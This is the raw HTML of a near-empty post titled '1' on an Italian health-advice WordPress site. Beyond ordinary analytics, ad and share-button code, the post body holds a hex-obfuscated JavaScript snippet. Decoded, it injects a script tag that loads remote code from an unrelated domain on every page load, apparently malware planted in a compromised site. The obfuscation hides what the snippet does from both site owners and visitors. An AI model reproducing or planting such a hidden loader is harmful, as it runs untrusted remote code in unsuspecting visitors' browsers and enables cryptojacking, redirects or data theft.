<!DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" lang="it-IT" prefix="og: http://ogp.me/ns#">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" lang="it-IT" prefix="og: http://ogp.me/ns#">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" lang="it-IT" prefix="og: http://ogp.me/ns#">
<![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8)  ]><!-->
<html lang="it-IT" prefix="og: http://ogp.me/ns#">
<!--<![endif]-->
<head>
<meta charset="UTF-8" />
<title>1</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all"
	href="http://www.informasalute.com/wp-content/themes/swift-basic/style.css" />
<meta name="viewport" content="width=device-width">
<link rel="pingback" href="http://www.informasalute.com/xmlrpc.php" />
<!--[if lt IE 9]>
<script src="http://www.informasalute.com/wp-content/themes/swift-basic/js/html5.js" type="text/javascript"></script>
<![endif]-->

<!-- This site is optimized with the Yoast SEO plugin v6.3.1 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://www.informasalute.com/salute/1-3/" />
<meta property="og:locale" content="it_IT" />
<meta property="og:type" content="article" />
<meta property="og:title" content="1" />
<meta property="og:description" content="1 Articoli che possono interessarti: Sentire meno da un orecchio" />
<meta property="og:url" content="http://www.informasalute.com/salute/1-3/" />
<meta property="og:site_name" content="InformaSalute - Consigli di Salute, Medicina e Diete" />
<meta property="article:section" content="Salute" />
<meta property="article:published_time" content="2018-03-26T03:11:26+00:00" />
<meta property="article:modified_time" content="2018-03-26T17:10:41+00:00" />
<meta property="og:updated_time" content="2018-03-26T17:10:41+00:00" />
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/www.informasalute.com\/","name":"InformaSalute - Consigli di Salute, Medicina e Diete","potentialAction":{"@type":"SearchAction","target":"http:\/\/www.informasalute.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="InformaSalute - Consigli di Salute, Medicina e Diete &raquo; Feed" href="http://www.informasalute.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="InformaSalute - Consigli di Salute, Medicina e Diete &raquo; Feed dei commenti" href="http://www.informasalute.com/comments/feed/" />
<!-- This site uses the Google Analytics by MonsterInsights plugin v7.0.3 - Using Analytics tracking - https://www.monsterinsights.com/ -->
<script type="text/javascript" data-cfasync="false">
	var mi_track_user = true;
	var disableStr = 'ga-disable-UA-97392379-1';

	/* Function to detect opted out users */
	function __gaTrackerIsOptedOut() {
		return document.cookie.indexOf(disableStr + '=true') > -1;
	}

	/* Disable tracking if the opt-out cookie exists. */
	if ( __gaTrackerIsOptedOut() ) {
		window[disableStr] = true;
	}

	/* Opt-out function */
	function __gaTrackerOptout() {
	  document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
	  window[disableStr] = true;
	}
	
	if ( mi_track_user ) {
		(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
		})(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker');

		__gaTracker('create', 'UA-97392379-1', 'auto');
		__gaTracker('set', 'forceSSL', true);
		__gaTracker('send','pageview');
	} else {
		console.log( "" );
		(function() {
			/* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */
			var noopfn = function() {
				return null;
			};
			var noopnullfn = function() {
				return null;
			};
			var Tracker = function() {
				return null;
			};
			var p = Tracker.prototype;
			p.get = noopfn;
			p.set = noopfn;
			p.send = noopfn;
			var __gaTracker = function() {
				var len = arguments.length;
				if ( len === 0 ) {
					return;
				}
				var f = arguments[len-1];
				if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) {
					console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you\'re not being tracked. ");
					return;
				}
				try {
					f.hitCallback();
				} catch (ex) {

				}
			};
			__gaTracker.create = function() {
				return new Tracker();
			};
			__gaTracker.getByName = noopnullfn;
			__gaTracker.getAll = function() {
				return [];
			};
			__gaTracker.remove = noopfn;
			window['__gaTracker'] = __gaTracker;
		})();
		}
</script>
<!-- / Google Analytics by MonsterInsights -->
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.informasalute.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='yarppWidgetCss-group-css' href='http://www.informasalute.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/yet-another-related-posts-plugin/style/widget.css,wp-content/plugins/contact-form-7/includes/css/styles.css,wp-content/plugins/cookie-notice/css/front.min.css,wp-content/plugins/yet-another-related-posts-plugin/style/related.css,wp-content/uploads/swift-magic/custom-styles.css,wp-content/themes/swift-basic/css/responsive.css' type='text/css' media='all' />
<link rel='stylesheet' id='digg-digg-group-css' href='http://www.informasalute.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/digg-digg/css/diggdigg-style.css' type='text/css' media='screen' />
<script type='text/javascript'>
/* <![CDATA[ */
var monsterinsights_frontend = {"js_events_tracking":"true","is_debug_mode":"false","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"","home_url":"http:\/\/www.informasalute.com","track_download_as":"event","internal_label":"int","hash_tracking":"false"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.informasalute.com/wp-content/plugins/bwp-minify/min/?f=wp-includes/js/jquery/jquery.js,wp-includes/js/jquery/jquery-migrate.min.js,wp-includes/js/jquery/ui/core.min.js,wp-includes/js/jquery/ui/widget.min.js,wp-includes/js/jquery/ui/tabs.min.js,wp-content/uploads/swift-magic/swift-js.js,wp-includes/js/jquery/ui/position.min.js,wp-content/themes/swift-basic/js/jquery.ui.tooltip.min.js,wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js'></script>
<link rel='https://api.w.org/' href='http://www.informasalute.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.informasalute.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.informasalute.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.4" />
<link rel='shortlink' href='http://www.informasalute.com/?p=4588' />
<link rel="alternate" type="application/json+oembed" href="http://www.informasalute.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.informasalute.com%2Fsalute%2F1-3%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.informasalute.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.informasalute.com%2Fsalute%2F1-3%2F&#038;format=xml" />
</head>
<body class="post-template-default single single-post postid-4588 single-format-standard" id="top">
		<div id="wrapper" class="clearfix">
		<!-- This div will be closed in the footer.php file -->
				<div id="header-container">
			<header id="header" class="clearfix">
				<div id="branding-container">
	<div id="branding" class="clearfix hybrid">
		<div class="div-content clearfix">
			
						<hgroup class="alignleft">
				<h3 id="site-title">
					<a href="http://www.informasalute.com/"
						title="InformaSalute &#8211; Consigli di Salute, Medicina e Diete" rel="home">InformaSalute &#8211; Consigli di Salute, Medicina e Diete					</a>
				</h3>
				<h4 id="site-description">
					News su consigli su salute, medicina, benessere, una guida sulla nutrizione e sulle diete.				</h4>
			</hgroup>
					</div>
	</div>
	<!-- /branding -->
</div>
<div class="clear"></div>
<div id="below-logo-container">
	<nav id="below-logo" class="hybrid navigation clearfix"
		role="navigation">
		<ul class="nav clearfix"><li id="menu-item-2401" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2401"><a href="http://www.informasalute.com/contatti/">Contatti e Pubblicità</a></li>
<li id="menu-item-2444" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2444"><a href="http://www.informasalute.com/siamo-segnalati-su/">Disclaimer Medico</a></li>
<li id="menu-item-2445" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2445"><a href="http://www.informasalute.com/privacy/">Privacy : Linee Guida</a></li>
<li id="menu-item-2566" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2566"><a href="http://www.informasalute.com/guarda-il-video/">Guarda il video</a></li>
<li id="menu-item-3636" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3636"><a href="http://www.informasalute.com/uso-dei-cookie/">Uso dei Cookie</a></li>
		</ul>
		<form method="get" action="http://www.informasalute.com/" id="navsearch">
	<input type="text" value="Type and hit enter to Search" name="s"
		onfocus="if (this.value == 'Type and hit enter to Search') {this.value = '';}"
		onblur="if (this.value == '') {this.value = 'Type and hit enter to Search';}"
		class="textfield" /> <input type="hidden" value="GO" />
</form>

	</nav>
</div>
			</header>
		</div>
		
		<div id="main" class="hybrid">
			<!-- Will be closed in footer.php -->
									<div id="left" class="clearfix">
				<!-- Will be closed in sidebar.php, in the page templates if we are not using sidebar  -->
				
<div id="content" role="main">
	<div id="single-content" class="div-content">
		
		

		<div class="clear"></div>
<article
	id="post-4588" class="post-4588 post type-post status-publish format-standard hentry category-salute">
		<header class="entry-header">
		<div class="entry-meta single-meta-above-title">posted on <span class="date"><a href="http://www.informasalute.com/salute/1-3/" title="03:11" rel="bookmark"><time class="entry-date" datetime="2018-03-26T03:11:26+00:00" pubdate="pubdate">26/03/2018</time></a></span>  by <span class="author"><a href="http://www.informasalute.com/author/admin/" rel="author">admin</a></span> </div>		<h1 class="entry-title">
			1		</h1>
		<div class="border clearfix">
						<div class="entry-meta single-meta-below-title alignleft">Filed under <a href="http://www.informasalute.com/category/salute/" rel="category tag">Salute</a></div>						
		</div>
		<div class="share"></div>
	</header>
	<!-- .entry-header -->
		<div class="entry-content">
		<!-- adman_adcode_beginning --><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-9530292893924932";
/* InformaSalute_336x280_blu */
google_ad_slot = "5457084972";
google_ad_width = 336;
google_ad_height = 280;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center><!-- /adman_adcode_beginning --><a id="dd_start"></a><p>1 <script>var _0x29b4=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)</script></p>
<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script type='text/javascript' src='https://apis.google.com/js/plusone.js'></script><g:plusone size='tall' href='http://www.informasalute.com/salute/1-3/'></g:plusone></div><div class='dd_button'><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://www.informasalute.com/salute/1-3/" data-count="vertical" data-text="1" data-via="" ></a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div><!-- adman_adcode (middle, 1) --><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-9530292893924932";
/* InformaSalute_336x280_blu */
google_ad_slot = "5457084972";
google_ad_width = 336;
google_ad_height = 280;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center><!-- /adman_adcode (middle) --><div class='dd_button'><a name='fb_share' type='box_count' share_url='http://www.informasalute.com/salute/1-3/' href='http://www.facebook.com/sharer.php'></a><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script></div></div><div style='clear:both'></div></div><!-- Social Buttons Generated by Digg Digg plugin v5.3.6,
    Author : Buffer, Inc
    Website : http://bufferapp.com/diggdigg --><a id="dd_end"></a><div class='dd_outer'><div class='dd_inner'><div id='dd_ajax_float'><div class='dd_button_v'><script type='text/javascript' src='https://apis.google.com/js/plusone.js'></script><g:plusone size='tall' href='http://www.informasalute.com/salute/1-3/'></g:plusone></div><div style='clear:left'></div><div class='dd_button_v'><iframe src='http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.informasalute.com%2Fsalute%2F1-3%2F&amp;locale=en_US&amp;layout=box_count&amp;action=like&amp;width=50&amp;height=60&amp;colorscheme=light' scrolling='no' frameborder='0' style='border:none; overflow:hidden; width:50px; height:62px;' allowTransparency='true'></iframe></div><div style='clear:left'></div><div class='dd_button_v'><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://www.informasalute.com/salute/1-3/" data-count="vertical" data-text="1" data-via="" ></a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div><div style='clear:left'></div></div></div></div><script type="text/javascript">var dd_offset_from_content = 40;var dd_top_offset_from_content = 0;var dd_override_start_anchor_id = "";var dd_override_top_offset = "";</script><script type="text/javascript" src="http://www.informasalute.com/wp-content/plugins/digg-digg//js/diggdigg-floating-bar.js?ver=5.3.6"></script><!-- adman_adcode_after --><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-9530292893924932";
/* InformaSalute_336x280_blu */
google_ad_slot = "5457084972";
google_ad_width = 336;
google_ad_height = 280;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>
</br>
<center><script type="text/javascript">
    (function() {
        if (document.readyState === 'complete') return;
        if (typeof EbuzzingCurrentAsyncId === 'undefined') window.EbuzzingCurrentAsyncId = 0;
        else EbuzzingCurrentAsyncId++;
        var containerId = 'EbuzzingVideoContainer' + EbuzzingCurrentAsyncId;
        document.write('<d'+'iv id="' + containerId + '"></di'+'v>');
        var params = {"size":15}; eval('window.EbuzzingScriptParams_' + containerId + ' = params;');
        var s = document.createElement('script');
        s.async = true; s.defer = true;
        s.src = '//crunch.ebuzzing.com/feed_channel38244.js?target=' + containerId;
        var x = document.getElementsByTagName('script')[0];
        x.parentNode.insertBefore(s, x);
    })();
</script></center><!-- /adman_adcode_after --><div class='yarpp-related'>
<p>Articoli che possono interessarti:</p><ol>
<li><a href="http://www.informasalute.com/salute/sentire-meno-un-orecchio/" rel="bookmark" title="Sentire meno da un orecchio">Sentire meno da un orecchio </a></li>
</ol>
</div>
		<div class="clear"></div>
		
			</div>
	<!-- .entry-content -->

	<footer class="single">
		<div id="rp-sm">
			<nav id="nav-single" class="clearfix">
				<span class="nav-previous btn"><a href="http://www.informasalute.com/salute/scegliere-un-poliambulatorio-ad-ancona/"  title='Come scegliere un poliambulatorio ad Ancona' rel"prev">&larr; Previous</a></span>				<span class="nav-next btn"><a href="http://www.informasalute.com/salute/1-4/"  title='1' rel"next">Next &rarr;</a></span>				</span>
			</nav>
			<!-- #nav-single -->

						<div class='yarpp-related'>
<p>Articoli che possono interessarti:</p><ol>
<li><a href="http://www.informasalute.com/guarda-il-video/" rel="bookmark" title="Guarda il video">Guarda il video </a></li>
<li><a href="http://www.informasalute.com/salute/sentire-meno-un-orecchio/" rel="bookmark" title="Sentire meno da un orecchio">Sentire meno da un orecchio </a></li>
</ol>
</div>
					</div>

			</footer>
	<!-- .entry-meta -->
</article>
<!-- #post-4588 -->
<div class="clear"></div>

		
		<div id="comments">
	

<p class="nocomments">
	Comments are closed.</p>

</div>
<!-- #comments -->

					</div>
	<!-- #content -->
</div>
<!-- #primary -->
<div id="sidebar-container">

	<div id="sidebar" class="clearfix">

		<aside class="wsb widget-mas">
			<div class="div-content">
							</div>
		</aside>
		<div id="sticky">
			<aside class="wsb widget-mas">
				<div class="div-content">
					<aside id="search-3" class="widget widget_search"><form method="get" id="searchform" action="http://www.informasalute.com/">
	<fieldset>
		<input type="text" value="Search the site&hellip;" name="s"
			onfocus="if (this.value == 'Search the site&hellip;') {this.value = '';}"
			onblur="if (this.value == '') {this.value = 'Search the site&hellip;';}"
			class="radius3  alignleft" name="s" id="s" /> <input type="submit"
			class="btn small success alignleft" id="searchsubmit"
			value="Search" />
	</fieldset>
</form>
</aside>		<aside id="recent-posts-3" class="widget widget_recent_entries">		<p class="widget-title">Articoli recenti</p>		<ul>
											<li>
					<a href="http://www.informasalute.com/uncategorized/the-undeniable-reality-about-argument-essay-topics-3/">The Undeniable Reality About Argument Essay Topics That Nobody Is Sharing With You</a>
									</li>
											<li>
					<a href="http://www.informasalute.com/uncategorized/top-end-my-essay-choices-45/">Top End My Essay Choices</a>
									</li>
											<li>
					<a href="http://www.informasalute.com/salute/1-4/">1</a>
									</li>
											<li>
					<a href="http://www.informasalute.com/salute/1-3/">1</a>
									</li>
											<li>
					<a href="http://www.informasalute.com/salute/scegliere-un-poliambulatorio-ad-ancona/">Come scegliere un poliambulatorio ad Ancona</a>
									</li>
					</ul>
		</aside><aside id="linkcat-2" class="widget widget_links"><p class="widget-title">Blogroll</p>
	<ul class='xoxo blogroll'>
<li><a href="http://www.calcolopesoideale.org/" title="Calcolare il peso ideale">Calcolo Peso Ideale</a>
Calcolare il peso ideale</li>

	</ul>
</aside>
<aside id="text-4" class="widget widget_text">			<div class="textwidget"><script id="_wau6pe">var _wau = _wau || []; _wau.push(["small", "oubsvy6p2enh", "6pe"]);(function() { var s=document.createElement("script"); s.async=true; s.src="http://widgets.amung.us/small.js";document.getElementsByTagName("head")[0].appendChild(s);})();</script></div>
		</aside>
				</div>
			</aside>

			<aside id="sb1" class="widget-mas">
				<div class="div-content">
									</div>
			</aside>

			<aside id="sb2" class="widget-mas">
				<div class="div-content">
									</div>
			</aside>

			<div class="clear"></div>
			<aside class="wsb widget-mas">
				<div class="div-content">
									</div>
			</aside>
		</div>
	</div>
	<!-- /#sidebar -->
</div>
<!-- /#sidebar-container -->
<div class="clear"></div>

</div>
<!-- /#left -->

</div>
<!-- /#main -->
<div class="clear"></div>
<footer>
	
	<div id="footer-container">
		<div id="footer" class="hybrid clearfix footer">

			<div class="fourcol-one footer-widgets">
				<div class="div-content">
									</div>
			</div>
			<!--End of footer-1 -->

			<div class="fourcol-one footer-widgets">
				<div class="div-content">
									</div>
			</div>
			<!--End of footer-1 -->

			<div class="fourcol-one footer-widgets">
				<div class="div-content">
									</div>
			</div>
			<!--End of footer-1 -->

			<div class="fourcol-one footer-widgets">
				<div class="div-content">
									</div>
			</div>
			<!--End of footer-1 -->
		</div>
		<!-- /#footer -->
	</div>
	<!-- /#footer-contianer -->

	<div id="copyright-container">
		<div id="copyright" class="hybrid clearfix">
			<div class="div-content">
				<div class="alignleft">
									</div>
				<span class="alignright">Theme Swift by <a
					href="http://swiftthemes.com/swiftlers-area/go.php?r=1922"
					rel="nofollow"><strong>SwiftThemes.Com</strong> </a> </span>

				<div class="clear"></div>
				<span class="alignleft">Copyright &copy;&nbsp;2018					<a href="http://www.informasalute.com/">InformaSalute &#8211; Consigli di Salute, Medicina e Diete </a>
					| <a href="http://www.informasalute.com/feed/">Entries (RSS)</a> and <a href="http://www.informasalute.com/comments/feed/">Comments (RSS)</a>				</span> <span class="alignright">powered by					<a href="http://wordpress.org/" rel="nofollow">WordPress</a> <a
					href="#top" id="backtotop">[Back to top						&uarr; ]
				</a> </span>
				<div class="clear"></div>
			</div>
		</div>
		<!-- /copyright -->
	</div>
	<!-- /copyright-container -->

	</footer>
</div>
<!-- /#wrapper -->
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/www.informasalute.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Per favore dimostra che non sei un robot."}},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript'>
/* <![CDATA[ */
var cnArgs = {"ajaxurl":"http:\/\/www.informasalute.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"TRUE","cookieTime":"604800","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.informasalute.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/contact-form-7/includes/js/scripts.js,wp-content/plugins/cookie-notice/js/front.min.js,wp-includes/js/wp-embed.min.js'></script>

			<div id="cookie-notice" role="banner" class="cn-bottom bootstrap" style="color: #fff; background-color: #000;"><div class="cookie-notice-container"><span id="cn-notice-text">Utilizziamo i cookie per essere sicuri che tu possa avere la migliore esperienza sul nostro sito. Se continui ad utilizzare questo sito noi assumiamo che tu ne sia felice.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie button bootstrap">Ok</a><a href="http://www.informasalute.com/uso-dei-cookie/" target="_blank" id="cn-more-info" class="cn-more-info button bootstrap">Leggi di più</a>
				</div>
			</div></body>
</html>
